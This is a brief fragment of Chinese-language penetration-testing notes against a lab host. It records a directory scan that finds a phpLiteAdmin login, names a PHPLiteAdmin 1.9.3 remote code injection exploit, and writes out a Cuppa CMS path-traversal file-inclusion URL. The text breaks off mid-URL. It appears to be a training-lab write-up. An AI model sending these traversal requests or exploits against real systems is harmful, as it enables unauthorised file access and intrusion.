目录扫描,拿到登陆地址 http://10.11.1.116/db/phpliteadmin.phpadmin phpliteadmin 1.9.3PHPLiteAdmin 1.9.3 - Remote PHP Code Injection - PHP webapps Exploit Cuppa CMS 文件包含漏洞 http://10.11.1.116/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../usr/l...